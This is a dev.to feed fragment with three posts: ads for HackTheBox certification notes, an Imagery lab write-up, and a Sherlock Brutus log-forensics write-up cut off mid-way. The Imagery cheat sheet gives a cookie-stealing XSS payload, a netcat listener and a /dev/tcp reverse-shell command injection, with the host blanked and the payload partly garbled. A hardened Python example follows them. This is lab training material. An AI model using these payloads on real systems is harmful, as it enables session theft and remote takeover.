&lt;p&gt;Active Directory (AD) is a significant component of the CPTS exam, and these notes dedicate substantial space to demystifying AD attacks. You will find detailed workflows for enumerating domains, users, and groups using PowerShell and BloodHound to map attack paths. The &lt;strong&gt;HTB CPTS Notes&lt;/strong&gt; cover critical attack vectors such as Kerberoasting, AS-REP Roasting, and Pass-the-Hash, explaining not just the tools (like Impacket and Rubeus) but the underlying mechanics of Kerberos authentication.&lt;/p&gt;

&lt;p&gt;Furthermore, the guide walks you through complex lateral movement techniques and domain privilege escalation, ensuring you can navigate from a single compromised workstation to complete Domain Admin control.&lt;/p&gt;

&lt;h3&gt;
  
  
  Web Application Penetration Testing Mastery
&lt;/h3&gt;

&lt;p&gt;Web exploitation is vast, but these notes distill the chaos into actionable methodologies. The guide covers the OWASP Top 10 and beyond, providing concrete examples and payloads for SQL Injection (including blind and boolean-based), Cross-Site Scripting (XSS), and Server-Side Template Injection (SSTI).&lt;/p&gt;

&lt;p&gt;It specifically targets Content Management Systems (CMS) like WordPress, Joomla, Drupal, and Jenkins, offering specific enumeration steps and exploit chains for each. Whether you are bypassing file upload filters, manipulating JSON Web Tokens (JWT), or exploiting Insecure Deserialization, the &lt;strong&gt;HTB CPTS Notes&lt;/strong&gt; provide the exact syntax and theoretical background needed to identify and exploit these vulnerabilities during your exam.&lt;/p&gt;

&lt;h3&gt;
  
  
  Privilege Escalation and Post-Exploitation
&lt;/h3&gt;

&lt;p&gt;Gaining a foothold is only half the battle; these notes ensure you can escalate privileges on both Windows and Linux systems. For Windows, the guide details manual enumeration of misconfigured services, unquoted service paths, and kernel exploits, alongside automated tools like WinPEAS.&lt;/p&gt;

&lt;p&gt;For Linux, it covers SUID binary exploitation, cron job abuse, and NFS root squashing. Beyond escalation, the notes emphasize post-exploitation and reporting—crucial skills for the CPTS. You will learn how to maintain persistence, harvest credentials using Mimikatz and LaZagne, and, most importantly, how to document your findings professionally using tools like SysReptor to meet the strict reporting standards of the exam.&lt;/p&gt;

&lt;h3&gt;
  
  
  Access a Preview Below
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://www.scribd.com/document/975165038/HTB-CPTS-Notes-Updated-2026#from_embed" rel="noopener noreferrer"&gt;HTB CPTS Notes | Updated 2026&lt;/a&gt; by &lt;a href="https://www.scribd.com/user/836656412/Motasem-Hamdan#from_embed" rel="noopener noreferrer"&gt;Motasem Hamdan&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/5aZFxA7MGck"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;h3&gt;
  
  
  Start Below
&lt;/h3&gt;

&lt;p&gt;Don't leave your certification to chance. Equip yourself with the most detailed, exam-focused reference material available.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Click Here to Buy the Full HTB CPTS Notes Book Now&lt;/strong&gt;
&lt;/h3&gt;


&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/321854" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimg.buymeacoffee.com%2Fapi%2F%3Fextras%3DdXJsPSZjcmVhdG9yPVRoZSUyME1hc3Rlck1pbmRzJTIwTm90ZXMmZGVzaWduX2NvZGU9MiZkZXNpZ25fY29sb3I9JTIzRkZERDAwJnNsdWc9bm90ZXNjYXRhbG9nJmlzX2NyZWF0aW5nPUNvdXJzZXMlMkMlMjBTdHVkeSUyME5vdGVzJTIwJTI2JTIwQm9vayUyMFN1bW1hcmllcyZleHRyYXNfdGl0bGU9U0dGamExUm9aVUp2ZUNCRFpYSjBhV1pwWldRZ1VHVnVaWFJ5WVhScGIyNGdWR1Z6ZEdsdVp5QlRjR1ZqYVdGc2FYTjBJQ2hEVUZSVEtTQlRkSFZrZVNCT2IzUmxjeUI4SURJd01qWWdSV1JwZEdsdmJnJTNEJTNEJmV4dHJhc19pbWFnZT1hSFIwY0hNNkx5OWpaRzR1WW5WNWJXVmhZMjltWm1WbExtTnZiUzkxY0d4dllXUnpMM0psZDJGeVpITXZNakF5TlMwd055MHlNaTh4THpFNE1EQTBNVjlvZEhCZlkzQjBjMTkyTTE5amIzWmxjaTVxY0dWblFETXdNSGRmTUdVdWFuQm4%3D" height="601" class="m-0" width="1201"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/321854" rel="noopener noreferrer" class="c-link"&gt;
            HackTheBox Certified Penetration Testing Specialist (CPTS) Study Notes | 2026 Edition - Buymeacoffee
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            The HackTheBox CPTS Study Notes V8 are an 856-page PDF guide updated to meet the changes performed on the exam in 2026. They are designed to help candidates prepare for the Hack The Box Certified Pene
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fuploads%2Fprofile_pictures%2F2024%2F08%2FZM833oVaI4yezrXw.png%401f.png" width="200" height="200"&gt;
          buymeacoffee.com
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;


</description>
      <category>security</category>
      <category>tutorial</category>
      <category>cybersecurity</category>
      <category>career</category>
    </item>
    <item>
      <title>From Stored XSS to RCE | HackTheBox Imagery Writeup</title>
      <dc:creator>Motasem Hamdan</dc:creator>
      <pubDate>Wed, 04 Feb 2026 12:53:49 +0000</pubDate>
      <link>https://dev.to/motasem_hamdan_9c56098a7e/from-stored-xss-to-rce-hackthebox-imagery-writeup-26dl</link>
      <guid>https://dev.to/motasem_hamdan_9c56098a7e/from-stored-xss-to-rce-hackthebox-imagery-writeup-26dl</guid>
      <description>&lt;p&gt;I see it all the time in pentest reports: Stored XSS gets rated as Medium or even Low because it requires user interaction. But my recent run through &lt;a href="https://motasem-notes.net/from-stored-xss-to-rce-hackthebox-imagery-writeup/" rel="noopener noreferrer"&gt;&lt;strong&gt;HackTheBox’s Imagery&lt;/strong&gt;&lt;/a&gt; machine reminded me why that mindset is dangerous.&lt;/p&gt;

&lt;p&gt;The box is a perfect example of a Daisy Chain attack where a seemingly minor client-side bug becomes the skeleton key for the entire backend.&lt;/p&gt;

&lt;h3&gt;
  
  
  Note:
&lt;/h3&gt;

&lt;p&gt;This post is &lt;strong&gt;not a step-by-step walkthrough, exploit guide, or solution&lt;/strong&gt;. It is intentionally written as a &lt;strong&gt;learning-first methodology breakdown&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The value of this approach is simple: walkthroughs teach &lt;em&gt;what to type&lt;/em&gt;; methodologies teach &lt;em&gt;how to think&lt;/em&gt;. By focusing on enumeration strategy, decision-making patterns, and architectural reasoning, this post is designed to help you transfer the same mindset to &lt;strong&gt;real assessments, labs, certifications, and production environments&lt;/strong&gt;, not just this specific challenge.&lt;/p&gt;

&lt;p&gt;Use this content to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Sharpen your mental model, not your copy-paste skills&lt;/li&gt;
&lt;li&gt;Understand &lt;em&gt;why&lt;/em&gt; certain paths exist rather than memorizing how to reach them&lt;/li&gt;
&lt;li&gt;Build repeatable intuition that applies beyond CTFs&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If your goal is long-term growth as a security practitioner, this style will compound. If your goal is only to solve the box, this post is deliberately not optimized for that.&lt;/p&gt;

&lt;h3&gt;
  
  
  Here is the TL;DR of the kill chain:
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The Enumeration Methodology&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The standard approach of blindly firing directory busters will yield limited returns here. The elite methodology requires a Feature-First audit.&lt;/p&gt;

&lt;p&gt;Upon discovering the web service on port 8000 (running Werkzeug/Python), your primary goal isn’t just to map endpoints, but to map &lt;strong&gt;data flows&lt;/strong&gt;. You must identify every input field: login forms, upload buttons and, critically, the “Bug Report” feature.&lt;/p&gt;

&lt;p&gt;The presence of a bug report system should trigger immediate investigation into &lt;strong&gt;Stored Cross-Site Scripting (XSS)&lt;/strong&gt; vectors.&lt;/p&gt;

&lt;p&gt;You are asking: If I submit this, who reads it? If the answer is “an admin”, you have a potential path to privilege hijacking.&lt;/p&gt;

&lt;p&gt;Simultaneously, the Image Transformation features (crop, rotate, etc.) must be flagged as high-probability targets for &lt;strong&gt;Command Injection&lt;/strong&gt;, as these often rely on underlying system shell commands rather than safe API calls.&lt;/p&gt;

&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/390668" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimg.buymeacoffee.com%2Fapi%2F%3Fextras%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%3D" height="auto" class="m-0"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/e/390668" rel="noopener noreferrer" class="c-link"&gt;
            HackTheBox Certified Web Exploitation Specialist (HTB CWES) Notes (Unofficial) - Buymeacoffee
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            Welcome to the HTB Certified Web Exploitation Specialist (HTB CWES) Guide. Whether you’re just starting your journey in ethical hacking or looking to refine your existing skills, this resource is stru
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fuploads%2Fprofile_pictures%2F2024%2F08%2FZM833oVaI4yezrXw.png%401f.png"&gt;
          buymeacoffee.com
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;




&lt;p&gt;&lt;strong&gt;Stored XSS&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;It started with a standard “Bug Report” feature. Most would check for SQLi and move on. I found I could inject a payload that resulted in stored XSS.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cookie Theft&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;It wasn’t about popping an alert box. I used the XSS to blindly exfiltrate the Administrator’s session cookie when they (the bot/admin) reviewed the report.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The RCE&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;With admin access, I reached the image management panel. Code review (leaked via a directory traversal bug) revealed a Command Injection flaw in the crop feature—but it was only accessible to authenticated admins. Without that "low prio" XSS, the RCE was unreachable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The PrivEsc&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Leaked the database credentials to crack the test user's hash.&lt;/p&gt;

&lt;p&gt;Found an encrypted backup (pyAesCrypt), brute-forced it to find &lt;em&gt;another&lt;/em&gt; user's hash.&lt;/p&gt;

&lt;p&gt;Finally rooted the box by abusing a custom backup utility running with sudo privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Commands Cheat Sheet&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;While the logic is paramount, having the right syntax is critical for execution.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;XSS Payload (Session Stealing):&lt;/strong&gt; Inject this into the bug report description to exfiltrate the admin’s cookie to your listener.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/x" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/x"&gt;&lt;/a&gt;:4444/?cookie='+document.cookie&amp;gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cookie Listener:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;nc -lvnp 4444&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Command Injection (ImageMagick Context):&lt;/strong&gt; If the application naively concatenates arguments, you can break out of the convert command: &lt;code&gt;; /bin/bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp//4445 0&amp;gt;&amp;amp;1';&lt;/code&gt;&lt;/p&gt;
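&lt;p&gt;The two web-side sinks in this chain, the bug-report render behind the stored XSS (and the cookie it exposed) and the crop feature behind the command injection, shown next to their hardened forms. This is an added example, not the Imagery application's code or the writeup's own; the upload path, the filename allow-list, the size limit and the ImageMagick &lt;code&gt;convert&lt;/code&gt; argument layout are assumptions.&lt;/p&gt;

```python
import html
import re
import subprocess
from pathlib import PurePosixPath

UPLOAD_DIR = PurePosixPath("/var/app/uploads")   # assumed upload location, not from the writeup
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(?:png|jpe?g|gif)$")
MAX_DIM = 10000                                   # assumed upper bound for crop geometry


def bug_report_text(description):
    """Escape on output: the stored description becomes a text node in the admin's
    report page, so any markup or script inside it is displayed, never executed."""
    return html.escape(description, quote=True)


def session_cookie_header(token, max_age=3600):
    """HttpOnly keeps the session value out of document.cookie, so an injection that
    slips past escaping still cannot read it; Secure and SameSite limit replay further."""
    return (f"Set-Cookie: session={token}; Path=/; Max-Age={max_age}; "
            "HttpOnly; Secure; SameSite=Lax")


def crop_command_vulnerable(filename, geometry):
    """The pattern the writeup describes: fields are pasted into one shell string,
    so a ';' in either field ends 'convert' and starts a second command."""
    return f"convert {filename} -crop {geometry} {filename}"


def crop_argv(filename, x, y, w, h):
    """Allow-list the name (no separators, no '..'), coerce geometry to bounded integers
    and return an argv list; run it with shell=False so nothing is ever re-parsed."""
    if not SAFE_NAME.match(filename):
        raise ValueError("filename failed allow-list")
    try:
        x, y, w, h = (int(v) for v in (x, y, w, h))
    except (TypeError, ValueError):
        raise ValueError("geometry must be integers") from None
    if x not in range(MAX_DIM) or y not in range(MAX_DIM):
        raise ValueError("offset out of range")
    if w not in range(1, MAX_DIM + 1) or h not in range(1, MAX_DIM + 1):
        raise ValueError("size out of range")
    src = str(UPLOAD_DIR / filename)
    return ["convert", src, "-crop", f"{w}x{h}+{x}+{y}", src]


def crop_request_is_safe(filename, x, y, w, h):
    """True when the request would reach ImageMagick as fixed argv, False when rejected."""
    try:
        crop_argv(filename, x, y, w, h)
        return True
    except ValueError:
        return False


def run_crop(filename, x, y, w, h):
    """Execute the hardened command; argv goes straight to execve, no shell involved."""
    return subprocess.run(crop_argv(filename, x, y, w, h), shell=False,
                          check=True, capture_output=True)
```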

&lt;p&gt;&lt;strong&gt;Stabilizing the Shell:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;python3 -c 'import pty; pty.spawn("/bin/bash")'&lt;/code&gt;, then Ctrl+Z and &lt;code&gt;stty raw -echo; fg&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Privilege Escalation (Cron/File Monitoring):&lt;/strong&gt; If a root script processes files in a directory you control, creating a malicious file name or content can trigger execution.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;echo 'import os; os.system("/bin/bash")' &amp;gt; /tmp/malicious.py&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Takeaway&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you are ignoring XSS to hunt for “cooler” binary exploits, you are missing the forest for the trees. In modern web apps, XSS is often the only way to bridge the gap between “Public User” and “Internal Admin” where the RCEs actually live.&lt;/p&gt;

&lt;p&gt;If you want to see the exact payloads, the Python scripts I used for the crypto-cracking, and the full step-by-step breakdown, check out my writeup here.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Join the Cyber Security Notes Membership:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Get exclusive cybersecurity notes, weekly expert insights, and practical breakdowns you won’t find in public feeds. Built for people who want clarity, not content overload.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;div class="c-embed__content"&gt;
        &lt;div class="c-embed__cover"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/membership" class="c-link align-middle" rel="noopener noreferrer"&gt;
            &lt;img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fopengraph%2Fimages%2F1730588%2F1%2Fog_9630827_1765478408.jpg" height="auto" class="m-0"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="c-embed__body"&gt;
        &lt;h2 class="fs-xl lh-tight"&gt;
          &lt;a href="https://buymeacoffee.com/notescatalog/membership" rel="noopener noreferrer" class="c-link"&gt;
            Membership | The MasterMinds Notes - Buymeacoffee
          &lt;/a&gt;
        &lt;/h2&gt;
          &lt;p class="truncate-at-3"&gt;
            AboutCyber Security Notes &amp;amp;amp; CoursesContactconsultation@motasem-notes.netProduct's Legal &amp;amp;amp; TOS InfoPlease read all terms of service and legal information about the products from hereReviews and
          &lt;/p&gt;
        &lt;div class="color-secondary fs-s flex items-center"&gt;
            &lt;img alt="favicon" class="c-embed__favicon m-0 mr-2 radius-0" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.buymeacoffee.com%2Fuploads%2Fprofile_pictures%2F2024%2F08%2FZM833oVaI4yezrXw.png%401f.png"&gt;
          buymeacoffee.com
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;





&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/QtMFd_k9aAg"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

</description>
      <category>security</category>
      <category>cybersecurity</category>
      <category>programming</category>
      <category>learning</category>
    </item>
    <item>
      <title>HackTheBox Sherlock Brutus Writeup</title>
      <dc:creator>Motasem Hamdan</dc:creator>
      <pubDate>Wed, 04 Feb 2026 12:10:51 +0000</pubDate>
      <link>https://dev.to/motasem_hamdan_9c56098a7e/hackthebox-sherlock-brutus-writeup-537g</link>
      <guid>https://dev.to/motasem_hamdan_9c56098a7e/hackthebox-sherlock-brutus-writeup-537g</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu48tvzk396x5118l1wbc.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu48tvzk396x5118l1wbc.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;HackTheBox Brutus is a beginner-level DFIR challenge that includes an &lt;em&gt;auth.log&lt;/em&gt; file and a &lt;em&gt;wtmp&lt;/em&gt; file as key artifacts. Using these, we’ll track how an attacker conducted an SSH brute force attack, ultimately succeeding in guessing the root user’s password. We’ll then analyze how the attacker manually reconnects, creates a new user, and adds this user to the sudo group. Finally, we’ll observe how the new user logs in and executes a few commands with sudo privileges.&lt;/p&gt;

&lt;h2&gt;
  
  
  HackTheBox Sherlock Brutus Description
&lt;/h2&gt;

&lt;p&gt;In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.&lt;/p&gt;

&lt;h2&gt;
  
  
  HackTheBox Sherlock Brutus Questions
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?&lt;/li&gt;
&lt;li&gt;The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?&lt;/li&gt;
&lt;li&gt;Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?&lt;/li&gt;
&lt;li&gt;SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?&lt;/li&gt;
&lt;li&gt;The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?&lt;/li&gt;
&lt;li&gt;What is the MITRE ATT&amp;amp;CK sub-technique ID used for persistence?&lt;/li&gt;
&lt;li&gt;How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)&lt;/li&gt;
&lt;li&gt;The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Analysis
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Analyzing auth.log
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;auth.log&lt;/code&gt; file records both successful and failed login attempts, sudo and su actions, and other authentication-related processes. On Debian/Ubuntu systems, this log is stored at &lt;code&gt;/var/log/auth.log&lt;/code&gt;, while on RedHat/CentOS systems, it is located at &lt;code&gt;/var/log/secure&lt;/code&gt;. Referring to the first entry in the &lt;code&gt;auth.log&lt;/code&gt; for Brutus:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Date/Time: March 6 at 06:18:01&lt;/li&gt;
&lt;li&gt;Hostname: ip-172-31-35-28&lt;/li&gt;
&lt;li&gt;Service: The cron service&lt;/li&gt;
&lt;li&gt;Process ID (PID): 1119&lt;/li&gt;
&lt;li&gt;Message: The root user initiated a cron job (scheduled Linux task) executed as the confluence user, who has a user ID (UID) of 998.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ unzip -l Brutus.zip   
Archive:  Brutus.zip  
      Date       Name  
  ----------   ----  
    11:47   auth.log  
   11:47   wtmp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;







&lt;h3&gt;
  
  
  Analyzing wtmp
&lt;/h3&gt;

&lt;p&gt;The wtmp file is one of three files used to log login and logout events on a Linux system:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;/var/run/utmp: Tracks currently logged-in users.&lt;/li&gt;
&lt;li&gt;/var/log/wtmp: Maintains a historical record of login and logout events.&lt;/li&gt;
&lt;li&gt;/var/log/btmp: Logs unsuccessful login attempts.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ head -1 auth.log   
Dec  01 03:13:41 ip-172-31-35-28 CRON[1119]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These files store their data in a binary format, so their contents cannot be easily understood when accessed directly. Instead, specific Linux utilities are used to parse and display their information.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;For utmp, the &lt;code&gt;who&lt;/code&gt; (or &lt;code&gt;w&lt;/code&gt;) command will display its contents.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;last&lt;/code&gt; command can be used to view wtmp.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;lastb&lt;/code&gt; command is for examining btmp.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ sudo lastb  
root     pts/13                        Dec  01 03:13:41  (00:00)

btmp begins Dec  01 03:13:41
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To examine a wtmp file independently, the &lt;code&gt;utmpdump&lt;/code&gt; utility can be used. It is included in the &lt;code&gt;util-linux&lt;/code&gt; package, which can be installed via &lt;code&gt;sudo apt install util-linux&lt;/code&gt;. When viewing the contents of a wtmp file with &lt;code&gt;utmpdump&lt;/code&gt;, the output includes the following columns:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Event Type&lt;/li&gt;
&lt;li&gt;PID (Process ID)&lt;/li&gt;
&lt;li&gt;Terminal ID&lt;/li&gt;
&lt;li&gt;User&lt;/li&gt;
&lt;li&gt;Host&lt;/li&gt;
&lt;li&gt;IP Address&lt;/li&gt;
&lt;li&gt;Timestamp
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ utmpdump wtmp   
Utmp dump of wtmp  
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-01-25T11:12:17,804944+00:00]  
[5] [00601] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,072401+00:00]  
[6] [00601] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,072401+00:00]  
[5] [00618] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,080342+00:00]  
[6] [00618] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,080342+00:00]  
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-01-25T11:12:33,792454+00:00]  
[7] [01284] [ts/0] [ubuntu  ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-01-25T11:13:58,354674+00:00]  
[8] [01284] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:15:12,956114+00:00]  
[7] [01483] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-01-25T11:15:40,806926+00:00]  
[8] [01404] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-01-25T12:34:34,949753+00:00]  
[7] [836798] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:33:49,408334+00:00]  
[5] [838568] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-02-11T10:39:02,172417+00:00]  
[6] [838568] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-02-11T10:39:02,172417+00:00]  
[7] [838962] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:41:11,700107+00:00]  
[8] [838896] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T10:41:46,272984+00:00]  
[7] [842171] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:54:27,775434+00:00]  
[8] [842073] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769514+00:00]  
[8] [836694] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769963+00:00]  
[1] [00000] [~~  ] [shutdown] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-02-11T11:09:18,000731+00:00]  
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:15,744575+00:00]  
[5] [00464] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]  
[6] [00464] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]  
[5] [00505] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]  
[6] [00505] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]  
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:29,538024+00:00]  
[7] [01583] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-03-06T06:19:55,151913+00:00]  
[7] [02549] [ts/1] [root    ] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:32:45,387923+00:00]  
[8] [02491] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-03-06T06:37:24,590579+00:00]  
[7] [02667] [ts/1] [cyberjunkie] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:37:35,475575+00:00]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  SSH Brute Force Analysis
